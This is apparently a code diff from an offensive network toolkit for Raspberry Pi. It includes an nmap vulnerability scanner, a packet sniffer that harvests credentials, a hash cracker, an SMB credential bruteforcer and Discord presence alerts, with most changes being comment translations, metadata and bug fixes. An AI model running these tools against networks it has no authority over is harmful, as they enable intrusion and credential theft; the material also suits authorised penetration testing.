# subprocess.run(['sudo', 'systemctl', 'start', 'NetworkManager'], capture_output=True)
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
return "success"
|
||||
|
||||
|
||||
@@ -1,16 +1,11 @@
|
||||
"""
|
||||
Vulnerability Scanner Action
|
||||
Scanne ultra-rapidement CPE (+ CVE via vulners si dispo),
|
||||
avec fallback "lourd" optionnel.
|
||||
Affiche une progression en % dans Bjorn.
|
||||
"""
|
||||
"""nmap_vuln_scanner.py - Nmap-based CPE/CVE vulnerability scanning with vulners integration."""
|
||||
|
||||
import re
|
||||
import time
|
||||
import nmap
|
||||
import json
|
||||
import logging
|
||||
from datetime import datetime, timedelta
|
||||
from datetime import datetime, timedelta, timezone
|
||||
from typing import Dict, List, Any
|
||||
|
||||
from shared import SharedData
|
||||
@@ -31,18 +26,28 @@ b_priority = 11
|
||||
b_cooldown = 0
|
||||
b_enabled = 1
|
||||
b_rate_limit = None
|
||||
b_timeout = 600
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 3
|
||||
b_risk_level = "medium"
|
||||
b_tags = ["vuln", "nmap", "cpe", "cve", "scanner"]
|
||||
b_category = "recon"
|
||||
b_name = "Nmap Vuln Scanner"
|
||||
b_description = "Nmap-based CPE/CVE vulnerability scanning with vulners integration."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "NmapVulnScanner.png"
|
||||
|
||||
# Regex compilé une seule fois (gain CPU sur Pi Zero)
|
||||
# Pre-compiled regex (saves CPU on Pi Zero)
|
||||
CVE_RE = re.compile(r'CVE-\d{4}-\d{4,7}', re.IGNORECASE)
|
||||
|
||||
|
||||
class NmapVulnScanner:
|
||||
"""Scanner de vulnérabilités via nmap (mode rapide CPE/CVE) avec progression."""
|
||||
"""Nmap vulnerability scanner (fast CPE/CVE mode) with progress tracking."""
|
||||
|
||||
def __init__(self, shared_data: SharedData):
|
||||
self.shared_data = shared_data
|
||||
# Pas de self.nm partagé : on instancie dans chaque méthode de scan
|
||||
# pour éviter les corruptions d'état entre batches.
|
||||
# No shared self.nm: instantiate per scan method to avoid state corruption between batches
|
||||
logger.info("NmapVulnScanner initialized")
|
||||
|
||||
# ---------------------------- Public API ---------------------------- #
|
||||
@@ -54,7 +59,7 @@ class NmapVulnScanner:
|
||||
self.shared_data.bjorn_progress = "0%"
|
||||
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
return 'failed'
|
||||
return 'interrupted'
|
||||
|
||||
# 1) Metadata
|
||||
meta = {}
|
||||
@@ -63,7 +68,7 @@ class NmapVulnScanner:
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# 2) Récupérer MAC et TOUS les ports
|
||||
# 2) Get MAC and ALL ports
|
||||
mac = row.get("MAC Address") or row.get("mac_address") or ""
|
||||
|
||||
ports_str = ""
|
||||
@@ -87,13 +92,13 @@ class NmapVulnScanner:
|
||||
|
||||
ports = [p.strip() for p in ports_str.split(';') if p.strip()]
|
||||
|
||||
# Nettoyage des ports (garder juste le numéro si format 80/tcp)
|
||||
# Strip port format (keep just the number from "80/tcp")
|
||||
ports = [p.split('/')[0] for p in ports]
|
||||
|
||||
self.shared_data.comment_params = {"ip": ip, "ports": str(len(ports))}
|
||||
logger.debug(f"Found {len(ports)} ports for {ip}: {ports[:5]}...")
|
||||
|
||||
# 3) Filtrage "Rescan Only"
|
||||
# 3) "Rescan Only" filtering
|
||||
if self.shared_data.config.get('vuln_rescan_on_change_only', False):
|
||||
if self._has_been_scanned(mac):
|
||||
original_count = len(ports)
|
||||
@@ -105,24 +110,24 @@ class NmapVulnScanner:
|
||||
self.shared_data.bjorn_progress = "100%"
|
||||
return 'success'
|
||||
|
||||
# 4) SCAN AVEC PROGRESSION
|
||||
# 4) SCAN WITH PROGRESS
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
return 'failed'
|
||||
return 'interrupted'
|
||||
|
||||
logger.info(f"Starting nmap scan on {len(ports)} ports for {ip}")
|
||||
findings = self.scan_vulnerabilities(ip, ports)
|
||||
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Scan interrupted by user")
|
||||
return 'failed'
|
||||
return 'interrupted'
|
||||
|
||||
# 5) Déduplication en mémoire avant persistance
|
||||
# 5) In-memory dedup before persistence
|
||||
findings = self._deduplicate_findings(findings)
|
||||
|
||||
# 6) Persistance
|
||||
self.save_vulnerabilities(mac, ip, findings)
|
||||
|
||||
# Finalisation UI
|
||||
# Final UI update
|
||||
self.shared_data.bjorn_progress = "100%"
|
||||
self.shared_data.comment_params = {"ip": ip, "vulns_found": str(len(findings))}
|
||||
logger.success(f"Vuln scan done on {ip}: {len(findings)} entries")
|
||||
@@ -130,7 +135,7 @@ class NmapVulnScanner:
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"NmapVulnScanner failed for {ip}: {e}")
|
||||
self.shared_data.bjorn_progress = "Error"
|
||||
self.shared_data.bjorn_progress = "0%"
|
||||
return 'failed'
|
||||
|
||||
def _has_been_scanned(self, mac: str) -> bool:
|
||||
@@ -161,7 +166,7 @@ class NmapVulnScanner:
|
||||
|
||||
ttl = int(self.shared_data.config.get('vuln_rescan_ttl_seconds', 0) or 0)
|
||||
if ttl > 0:
|
||||
cutoff = datetime.utcnow() - timedelta(seconds=ttl)
|
||||
cutoff = datetime.now(timezone.utc) - timedelta(seconds=ttl)
|
||||
final_ports = []
|
||||
for p in ports:
|
||||
if p not in seen:
|
||||
@@ -180,7 +185,7 @@ class NmapVulnScanner:
|
||||
# ---------------------------- Helpers -------------------------------- #
|
||||
|
||||
def _deduplicate_findings(self, findings: List[Dict]) -> List[Dict]:
|
||||
"""Supprime les doublons (même port + vuln_id) pour éviter des inserts inutiles."""
|
||||
"""Remove duplicates (same port + vuln_id) to avoid redundant inserts."""
|
||||
seen: set = set()
|
||||
deduped = []
|
||||
for f in findings:
|
||||
@@ -201,7 +206,7 @@ class NmapVulnScanner:
|
||||
return [str(cpe).strip()]
|
||||
|
||||
def extract_cves(self, text: str) -> List[str]:
|
||||
"""Extrait les CVE via regex pré-compilé (pas de recompilation à chaque appel)."""
|
||||
"""Extract CVEs using pre-compiled regex."""
|
||||
if not text:
|
||||
return []
|
||||
return CVE_RE.findall(str(text))
|
||||
@@ -210,8 +215,7 @@ class NmapVulnScanner:
|
||||
|
||||
def scan_vulnerabilities(self, ip: str, ports: List[str]) -> List[Dict]:
|
||||
"""
|
||||
Orchestre le scan en lots (batches) pour permettre la mise à jour
|
||||
de la barre de progression.
|
||||
Orchestrate scanning in batches for progress bar updates.
|
||||
"""
|
||||
all_findings = []
|
||||
|
||||
@@ -219,10 +223,10 @@ class NmapVulnScanner:
|
||||
use_vulners = bool(self.shared_data.config.get('nse_vulners', False))
|
||||
max_ports = int(self.shared_data.config.get('vuln_max_ports', 10 if fast else 20))
|
||||
|
||||
# Pause entre batches – important sur Pi Zero pour laisser respirer le CPU
|
||||
# Pause between batches -- important on Pi Zero to let the CPU breathe
|
||||
batch_pause = float(self.shared_data.config.get('vuln_batch_pause', 0.5))
|
||||
|
||||
# Taille de lot réduite par défaut (2 sur Pi Zero, configurable)
|
||||
# Reduced batch size by default (2 on Pi Zero, configurable)
|
||||
batch_size = int(self.shared_data.config.get('vuln_batch_size', 2))
|
||||
|
||||
target_ports = ports[:max_ports]
|
||||
@@ -240,7 +244,7 @@ class NmapVulnScanner:
|
||||
|
||||
port_str = ','.join(batch)
|
||||
|
||||
# Mise à jour UI avant le scan du lot
|
||||
# UI update before batch scan
|
||||
pct = int((processed_count / total) * 100)
|
||||
self.shared_data.bjorn_progress = f"{pct}%"
|
||||
self.shared_data.comment_params = {
|
||||
@@ -251,7 +255,7 @@ class NmapVulnScanner:
|
||||
|
||||
t0 = time.time()
|
||||
|
||||
# Scan du lot (instanciation locale pour éviter la corruption d'état)
|
||||
# Scan batch (local instance to avoid state corruption)
|
||||
if fast:
|
||||
batch_findings = self._scan_fast_cpe_cve(ip, port_str, use_vulners)
|
||||
else:
|
||||
@@ -263,11 +267,11 @@ class NmapVulnScanner:
|
||||
all_findings.extend(batch_findings)
|
||||
processed_count += len(batch)
|
||||
|
||||
# Mise à jour post-lot
|
||||
# Post-batch update
|
||||
pct = int((processed_count / total) * 100)
|
||||
self.shared_data.bjorn_progress = f"{pct}%"
|
||||
|
||||
# Pause CPU entre batches (vital sur Pi Zero)
|
||||
# CPU pause between batches (vital on Pi Zero)
|
||||
if batch_pause > 0 and processed_count < total:
|
||||
time.sleep(batch_pause)
|
||||
|
||||
@@ -275,10 +279,10 @@ class NmapVulnScanner:
|
||||
|
||||
def _scan_fast_cpe_cve(self, ip: str, port_list: str, use_vulners: bool) -> List[Dict]:
|
||||
vulns: List[Dict] = []
|
||||
nm = nmap.PortScanner() # Instance locale – pas de partage d'état
|
||||
nm = nmap.PortScanner() # Local instance -- no shared state
|
||||
|
||||
# --version-light au lieu de --version-all : bien plus rapide sur Pi Zero
|
||||
# --min-rate/--max-rate : évite de saturer CPU et réseau
|
||||
# --version-light instead of --version-all: much faster on Pi Zero
|
||||
# --min-rate/--max-rate: avoid saturating CPU and network
|
||||
args = (
|
||||
"-sV --version-light -T4 "
|
||||
"--max-retries 1 --host-timeout 60s --script-timeout 20s "
|
||||
@@ -329,14 +333,14 @@ class NmapVulnScanner:
|
||||
|
||||
def _scan_heavy(self, ip: str, port_list: str) -> List[Dict]:
|
||||
vulnerabilities: List[Dict] = []
|
||||
nm = nmap.PortScanner() # Instance locale
|
||||
nm = nmap.PortScanner() # Local instance
|
||||
|
||||
vuln_scripts = [
|
||||
'vuln', 'exploit', 'http-vuln-*', 'smb-vuln-*',
|
||||
'ssl-*', 'ssh-*', 'ftp-vuln-*', 'mysql-vuln-*',
|
||||
]
|
||||
script_arg = ','.join(vuln_scripts)
|
||||
# --min-rate/--max-rate pour ne pas saturer le Pi
|
||||
# --min-rate/--max-rate to avoid saturating the Pi
|
||||
args = (
|
||||
f"-sV --script={script_arg} -T3 "
|
||||
"--script-timeout 30s --min-rate 50 --max-rate 100"
|
||||
@@ -371,7 +375,7 @@ class NmapVulnScanner:
|
||||
'details': str(output)[:200]
|
||||
})
|
||||
|
||||
# CPE Scan optionnel (sur ce batch)
|
||||
# Optional CPE scan (on this batch)
|
||||
if bool(self.shared_data.config.get('scan_cpe', False)):
|
||||
ports_for_cpe = list(discovered_ports_in_batch)
|
||||
if ports_for_cpe:
|
||||
@@ -381,10 +385,10 @@ class NmapVulnScanner:
|
||||
|
||||
def scan_cpe(self, ip: str, ports: List[str]) -> List[Dict]:
|
||||
cpe_vulns = []
|
||||
nm = nmap.PortScanner() # Instance locale
|
||||
nm = nmap.PortScanner() # Local instance
|
||||
try:
|
||||
port_list = ','.join([str(p) for p in ports])
|
||||
# --version-light à la place de --version-all (bien plus rapide)
|
||||
# --version-light instead of --version-all (much faster)
|
||||
args = "-sV --version-light -T4 --max-retries 1 --host-timeout 45s"
|
||||
nm.scan(hosts=ip, ports=port_list, arguments=args)
|
||||
|
||||
@@ -430,7 +434,7 @@ class NmapVulnScanner:
|
||||
if vid_upper.startswith('CVE-'):
|
||||
findings_by_port[port]['cves'].add(vid)
|
||||
elif vid_upper.startswith('CPE:'):
|
||||
# On stocke sans le préfixe "CPE:"
|
||||
# Store without the "CPE:" prefix
|
||||
findings_by_port[port]['cpes'].add(vid[4:])
|
||||
|
||||
# 1) CVEs
|
||||
|
||||
@@ -179,6 +179,10 @@ class OdinEye:
|
||||
|
||||
def execute(self, ip, port, row, status_key) -> str:
|
||||
"""Standard entry point."""
|
||||
# Reset per-run state to prevent accumulation across reused instances
|
||||
self.credentials.clear()
|
||||
self.statistics.clear()
|
||||
|
||||
iface = getattr(self.shared_data, "odin_eye_interface", "auto")
|
||||
if iface == "auto":
|
||||
iface = None # pyshark handles None as default
|
||||
@@ -186,10 +190,17 @@ class OdinEye:
|
||||
bpf_filter = getattr(self.shared_data, "odin_eye_filter", b_args["filter"]["default"])
|
||||
max_pkts = int(getattr(self.shared_data, "odin_eye_max_packets", 1000))
|
||||
timeout = int(getattr(self.shared_data, "odin_eye_timeout", 300))
|
||||
output_dir = getattr(self.shared_data, "odin_eye_output", "/home/bjorn/Bjorn/data/output/packets")
|
||||
_fallback_dir = os.path.join(getattr(self.shared_data, "data_dir", "/home/bjorn/Bjorn/data"), "output", "packets")
|
||||
output_dir = getattr(self.shared_data, "odin_eye_output", _fallback_dir)
|
||||
|
||||
logger.info(f"OdinEye: Starting capture on {iface or 'default'} (filter: {bpf_filter})")
|
||||
self.shared_data.log_milestone(b_class, "Startup", f"Sniffing on {iface or 'any'}")
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"iface": iface or "any", "filter": bpf_filter[:30]}
|
||||
|
||||
if not HAS_PYSHARK:
|
||||
logger.error("OdinEye requires pyshark but it is not installed.")
|
||||
return "failed"
|
||||
|
||||
try:
|
||||
self.capture = pyshark.LiveCapture(interface=iface, bpf_filter=bpf_filter)
|
||||
@@ -217,6 +228,8 @@ class OdinEye:
|
||||
if packet_count % 50 == 0:
|
||||
prog = int((packet_count / max_pkts) * 100)
|
||||
self.shared_data.bjorn_progress = f"{prog}%"
|
||||
# EPD live status update
|
||||
self.shared_data.comment_params = {"packets": str(packet_count), "creds": str(len(self.credentials))}
|
||||
self.shared_data.log_milestone(b_class, "Status", f"Captured {packet_count} packets")
|
||||
|
||||
except Exception as e:
|
||||
@@ -226,7 +239,7 @@ class OdinEye:
|
||||
finally:
|
||||
if self.capture:
|
||||
try: self.capture.close()
|
||||
except: pass
|
||||
except Exception: pass
|
||||
|
||||
# Save results
|
||||
if self.credentials or self.statistics['total_packets'] > 0:
|
||||
@@ -238,6 +251,8 @@ class OdinEye:
|
||||
"credentials": self.credentials
|
||||
}, f, indent=4)
|
||||
self.shared_data.log_milestone(b_class, "Complete", f"Capture finished. {len(self.credentials)} creds found.")
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
return "success"
|
||||
|
||||
|
||||
@@ -1,11 +1,5 @@
|
||||
# actions/presence_join.py
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
PresenceJoin — Sends a Discord webhook when the targeted host JOINS the network.
|
||||
- Triggered by the scheduler ONLY on transition OFF->ON (b_trigger="on_join").
|
||||
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
|
||||
- The action does not query anything: it only notifies when called.
|
||||
"""
|
||||
"""presence_join.py - Discord webhook notification when a target host joins the network."""
|
||||
|
||||
import requests
|
||||
from typing import Optional
|
||||
@@ -28,7 +22,20 @@ b_priority = 90
|
||||
b_cooldown = 0 # not needed: on_join only fires on join transition
|
||||
b_rate_limit = None
|
||||
b_trigger = "on_join" # <-- Host JOINED the network (OFF -> ON since last scan)
|
||||
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
|
||||
b_requires = None # Configure via DB to restrict to specific MACs if needed
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_category = "notification"
|
||||
b_name = "Presence Join"
|
||||
b_description = "Sends a Discord webhook notification when a host joins the network."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "1.0.0"
|
||||
b_timeout = 30
|
||||
b_max_retries = 1
|
||||
b_stealth_level = 10
|
||||
b_risk_level = "low"
|
||||
b_tags = ["presence", "discord", "notification"]
|
||||
b_icon = "PresenceJoin.png"
|
||||
|
||||
DISCORD_WEBHOOK_URL = "" # Configure via shared_data or DB
|
||||
|
||||
@@ -60,7 +67,9 @@ class PresenceJoin:
|
||||
host = row.get("hostname") or (row.get("hostnames") or "").split(";")[0] if row.get("hostnames") else None
|
||||
name = f"{host} ({mac})" if host else mac
|
||||
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
|
||||
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"mac": mac, "host": host or "unknown", "ip": ip_s or "?"}
|
||||
|
||||
# Add timestamp in UTC
|
||||
timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
|
||||
|
||||
|
||||
@@ -1,11 +1,5 @@
|
||||
# actions/presence_left.py
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
PresenceLeave — Sends a Discord webhook when the targeted host LEAVES the network.
|
||||
- Triggered by the scheduler ONLY on transition ON->OFF (b_trigger="on_leave").
|
||||
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
|
||||
- The action does not query anything: it only notifies when called.
|
||||
"""
|
||||
"""presence_left.py - Discord webhook notification when a target host leaves the network."""
|
||||
|
||||
import requests
|
||||
from typing import Optional
|
||||
@@ -28,8 +22,20 @@ b_priority = 90
|
||||
b_cooldown = 0 # not needed: on_leave only fires on leave transition
|
||||
b_rate_limit = None
|
||||
b_trigger = "on_leave" # <-- Host LEFT the network (ON -> OFF since last scan)
|
||||
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
|
||||
b_enabled = 1
|
||||
b_requires = None # Configure via DB to restrict to specific MACs if needed
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_category = "notification"
|
||||
b_name = "Presence Leave"
|
||||
b_description = "Sends a Discord webhook notification when a host leaves the network."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "1.0.0"
|
||||
b_timeout = 30
|
||||
b_max_retries = 1
|
||||
b_stealth_level = 10
|
||||
b_risk_level = "low"
|
||||
b_tags = ["presence", "discord", "notification"]
|
||||
b_icon = "PresenceLeave.png"
|
||||
|
||||
DISCORD_WEBHOOK_URL = "" # Configure via shared_data or DB
|
||||
|
||||
@@ -60,6 +66,8 @@ class PresenceLeave:
|
||||
mac = row.get("MAC Address") or row.get("mac_address") or "MAC"
|
||||
host = row.get("hostname") or (row.get("hostnames") or "").split(";")[0] if row.get("hostnames") else None
|
||||
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"mac": mac, "host": host or "unknown", "ip": ip_s or "?"}
|
||||
|
||||
# Add timestamp in UTC
|
||||
timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
|
||||
|
||||
@@ -82,7 +82,11 @@ class RuneCracker:
|
||||
return hashlib.sha512(password.encode()).hexdigest()
|
||||
elif h_type == 'ntlm':
|
||||
# NTLM is MD4(UTF-16LE(password))
|
||||
return hashlib.new('md4', password.encode('utf-16le')).hexdigest()
|
||||
try:
|
||||
return hashlib.new('md4', password.encode('utf-16le')).hexdigest()
|
||||
except ValueError:
|
||||
# MD4 not available in this Python build (e.g., FIPS mode)
|
||||
return None
|
||||
except Exception as e:
|
||||
logger.debug(f"Hashing error ({h_type}): {e}")
|
||||
return None
|
||||
@@ -107,6 +111,8 @@ class RuneCracker:
|
||||
}
|
||||
logger.success(f"Cracked {h_type}: {hv[:8]}... -> {password}")
|
||||
self.shared_data.log_milestone(b_class, "Cracked", f"{h_type} found!")
|
||||
# EPD live status update
|
||||
self.shared_data.comment_params = {"hashes": str(len(self.hashes)), "cracked": str(len(self.cracked))}
|
||||
|
||||
progress.advance()
|
||||
|
||||
@@ -115,7 +121,8 @@ class RuneCracker:
|
||||
input_file = str(getattr(self.shared_data, "rune_cracker_input", ""))
|
||||
wordlist_path = str(getattr(self.shared_data, "rune_cracker_wordlist", ""))
|
||||
self.hash_type = getattr(self.shared_data, "rune_cracker_type", None)
|
||||
output_dir = getattr(self.shared_data, "rune_cracker_output", "/home/bjorn/Bjorn/data/output/hashes")
|
||||
_fallback_dir = os.path.join(getattr(self.shared_data, "data_dir", "/home/bjorn/Bjorn/data"), "output", "hashes")
|
||||
output_dir = getattr(self.shared_data, "rune_cracker_output", _fallback_dir)
|
||||
|
||||
if not input_file or not os.path.exists(input_file):
|
||||
# Fallback: Check for latest odin_recon or other hashes if running in generic mode
|
||||
@@ -127,6 +134,8 @@ class RuneCracker:
|
||||
logger.error(f"Input file not found: {input_file}")
|
||||
return "failed"
|
||||
|
||||
# Reset per-run state to prevent accumulation across reused instances
|
||||
self.cracked.clear()
|
||||
# Load hashes
|
||||
self.hashes.clear()
|
||||
try:
|
||||
@@ -150,6 +159,8 @@ class RuneCracker:
|
||||
|
||||
logger.info(f"RuneCracker: Loaded {len(self.hashes)} hashes. Starting engine...")
|
||||
self.shared_data.log_milestone(b_class, "Initialization", f"Loaded {len(self.hashes)} hashes")
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"hashes": str(len(self.hashes)), "cracked": "0"}
|
||||
|
||||
# Prepare password plan
|
||||
dict_passwords = []
|
||||
@@ -167,34 +178,38 @@ class RuneCracker:
|
||||
self.shared_data.log_milestone(b_class, "Bruteforce", f"Testing {len(all_candidates)} candidates")
|
||||
|
||||
try:
|
||||
with ThreadPoolExecutor(max_workers=self.max_workers) as executor:
|
||||
for pwd in all_candidates:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
executor.shutdown(wait=False)
|
||||
return "interrupted"
|
||||
executor.submit(self._crack_password_worker, pwd, progress)
|
||||
except Exception as e:
|
||||
logger.error(f"Cracking engine error: {e}")
|
||||
return "failed"
|
||||
try:
|
||||
with ThreadPoolExecutor(max_workers=self.max_workers) as executor:
|
||||
for pwd in all_candidates:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
executor.shutdown(wait=False, cancel_futures=True)
|
||||
return "interrupted"
|
||||
executor.submit(self._crack_password_worker, pwd, progress)
|
||||
except Exception as e:
|
||||
logger.error(f"Cracking engine error: {e}")
|
||||
return "failed"
|
||||
|
||||
# Save results
|
||||
if self.cracked:
|
||||
os.makedirs(output_dir, exist_ok=True)
|
||||
out_file = os.path.join(output_dir, f"cracked_{int(time.time())}.json")
|
||||
with open(out_file, 'w', encoding="utf-8") as f:
|
||||
json.dump({
|
||||
"target_file": input_file,
|
||||
"total_hashes": len(self.hashes),
|
||||
"cracked_count": len(self.cracked),
|
||||
"results": self.cracked
|
||||
}, f, indent=4)
|
||||
logger.success(f"Cracked {len(self.cracked)} hashes! Results: {out_file}")
|
||||
self.shared_data.log_milestone(b_class, "Complete", f"Cracked {len(self.cracked)} hashes")
|
||||
return "success"
|
||||
|
||||
logger.info("Cracking finished. No matches found.")
|
||||
self.shared_data.log_milestone(b_class, "Finished", "No passwords found")
|
||||
return "success" # Still success even if 0 cracked, as it finished the task
|
||||
# Save results
|
||||
if self.cracked:
|
||||
os.makedirs(output_dir, exist_ok=True)
|
||||
out_file = os.path.join(output_dir, f"cracked_{int(time.time())}.json")
|
||||
with open(out_file, 'w', encoding="utf-8") as f:
|
||||
json.dump({
|
||||
"target_file": input_file,
|
||||
"total_hashes": len(self.hashes),
|
||||
"cracked_count": len(self.cracked),
|
||||
"results": self.cracked
|
||||
}, f, indent=4)
|
||||
logger.success(f"Cracked {len(self.cracked)} hashes! Results: {out_file}")
|
||||
self.shared_data.log_milestone(b_class, "Complete", f"Cracked {len(self.cracked)} hashes")
|
||||
return "success"
|
||||
|
||||
logger.info("Cracking finished. No matches found.")
|
||||
self.shared_data.log_milestone(b_class, "Finished", "No passwords found")
|
||||
return "success" # Still success even if 0 cracked, as it finished the task
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
if __name__ == "__main__":
|
||||
# Minimal CLI for testing
|
||||
|
||||
@@ -1,13 +1,7 @@
|
||||
# scanning.py – Network scanner (DB-first, no stubs)
|
||||
# - Host discovery (nmap -sn -PR)
|
||||
# - Resolve MAC/hostname (ThreadPoolExecutor) -> DB (hosts table)
|
||||
# - Port scan (ThreadPoolExecutor) -> DB (merge ports by MAC)
|
||||
# - Mark alive=0 for hosts not seen this run
|
||||
# - Update stats (stats table)
|
||||
# - Light logging (milestones) without flooding
|
||||
# - WAL checkpoint(TRUNCATE) + PRAGMA optimize at end of scan
|
||||
# - No DB insert without a real MAC. Unresolved IPs are kept in-memory.
|
||||
# - RPi Zero optimized: bounded thread pools, reduced retries, adaptive concurrency
|
||||
"""scanning.py - Network scanner: host discovery, MAC/hostname resolution, and port scanning.
|
||||
|
||||
DB-first design - all results go straight to SQLite. RPi Zero optimized.
|
||||
"""
|
||||
|
||||
import os
|
||||
import re
|
||||
@@ -38,6 +32,18 @@ b_priority = 1
|
||||
b_action = "global"
|
||||
b_trigger = "on_interval:180"
|
||||
b_requires = '{"max_concurrent": 1}'
|
||||
b_enabled = 1
|
||||
b_timeout = 300
|
||||
b_max_retries = 1
|
||||
b_stealth_level = 3
|
||||
b_risk_level = "low"
|
||||
b_tags = ["scan", "discovery", "network", "nmap"]
|
||||
b_category = "recon"
|
||||
b_name = "Network Scanner"
|
||||
b_description = "Host discovery, MAC/hostname resolution, and port scanning via nmap."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "NetworkScanner.png"
|
||||
|
||||
# --- Module-level constants (avoid re-creating per call) ---
|
||||
_MAC_RE = re.compile(r'([0-9A-Fa-f]{2})([-:])(?:[0-9A-Fa-f]{2}\2){4}[0-9A-Fa-f]{2}')
|
||||
|
||||
@@ -1,12 +1,7 @@
|
||||
"""
|
||||
smb_bruteforce.py — SMB bruteforce (DB-backed, no CSV/JSON, no rich)
|
||||
- Cibles fournies par l’orchestrateur (ip, port)
|
||||
- IP -> (MAC, hostname) depuis DB.hosts
|
||||
- Succès enregistrés dans DB.creds (service='smb'), 1 ligne PAR PARTAGE (database=<share>)
|
||||
- Conserve la logique de queue/threads et les signatures. Plus de rich/progress.
|
||||
"""
|
||||
"""smb_bruteforce.py - Threaded SMB credential bruteforcer with share enumeration."""
|
||||
|
||||
import os
|
||||
import shlex
|
||||
import threading
|
||||
import logging
|
||||
import time
|
||||
@@ -29,14 +24,27 @@ b_parent = None
|
||||
b_service = '["smb"]'
|
||||
b_trigger = 'on_any:["on_service:smb","on_new_port:445"]'
|
||||
b_priority = 70
|
||||
b_cooldown = 1800 # 30 minutes entre deux runs
|
||||
b_rate_limit = '3/86400' # 3 fois par jour max
|
||||
b_cooldown = 1800 # 30 min between runs
|
||||
b_rate_limit = '3/86400' # max 3 per day
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_timeout = 600
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 3
|
||||
b_risk_level = "medium"
|
||||
b_tags = ["bruteforce", "smb", "credentials", "shares"]
|
||||
b_category = "exploitation"
|
||||
b_name = "SMB Bruteforce"
|
||||
b_description = "Threaded SMB credential bruteforcer with share enumeration."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "SMBBruteforce.png"
|
||||
|
||||
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}
|
||||
|
||||
|
||||
class SMBBruteforce:
|
||||
"""Wrapper orchestrateur -> SMBConnector."""
|
||||
"""Orchestrator wrapper for SMBConnector."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
@@ -44,11 +52,11 @@ class SMBBruteforce:
|
||||
logger.info("SMBConnector initialized.")
|
||||
|
||||
def bruteforce_smb(self, ip, port):
|
||||
"""Lance le bruteforce SMB pour (ip, port)."""
|
||||
"""Run SMB bruteforce for (ip, port)."""
|
||||
return self.smb_bruteforce.run_bruteforce(ip, port)
|
||||
|
||||
def execute(self, ip, port, row, status_key):
|
||||
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
|
||||
"""Orchestrator entry point. Returns 'success' or 'failed'."""
|
||||
self.shared_data.bjorn_orch_status = "SMBBruteforce"
|
||||
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
|
||||
success, results = self.bruteforce_smb(ip, port)
|
||||
@@ -56,12 +64,12 @@ class SMBBruteforce:
|
||||
|
||||
|
||||
class SMBConnector:
|
||||
"""Gère les tentatives SMB, la persistance DB et le mapping IP→(MAC, Hostname)."""
|
||||
"""Handles SMB attempts, DB persistence, and IP->(MAC, Hostname) mapping."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
# Wordlists inchangées
|
||||
# Wordlists
|
||||
self.users = self._read_lines(shared_data.users_file)
|
||||
self.passwords = self._read_lines(shared_data.passwords_file)
|
||||
|
||||
@@ -74,7 +82,7 @@ class SMBConnector:
|
||||
self.queue = Queue()
|
||||
self.progress = None
|
||||
|
||||
# ---------- util fichiers ----------
|
||||
# ---------- file utils ----------
|
||||
@staticmethod
|
||||
def _read_lines(path: str) -> List[str]:
|
||||
try:
|
||||
@@ -142,10 +150,10 @@ class SMBConnector:
|
||||
|
||||
def smbclient_l(self, adresse_ip: str, user: str, password: str) -> List[str]:
|
||||
timeout = int(getattr(self.shared_data, "smb_connect_timeout_s", 6))
|
||||
cmd = f'smbclient -L {adresse_ip} -U {user}%{password}'
|
||||
cmd = ['smbclient', '-L', adresse_ip, '-U', f'{user}%{password}']
|
||||
process = None
|
||||
try:
|
||||
process = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)
|
||||
process = Popen(cmd, shell=False, stdout=PIPE, stderr=PIPE)
|
||||
try:
|
||||
stdout, stderr = process.communicate(timeout=timeout)
|
||||
except TimeoutExpired:
|
||||
@@ -164,7 +172,7 @@ class SMBConnector:
|
||||
logger.info(f"Trying smbclient -L for {adresse_ip} with user '{user}'")
|
||||
return []
|
||||
except Exception as e:
|
||||
logger.error(f"Error executing '{cmd}': {e}")
|
||||
logger.error(f"Error executing smbclient -L for {adresse_ip}: {e}")
|
||||
return []
|
||||
finally:
|
||||
if process:
|
||||
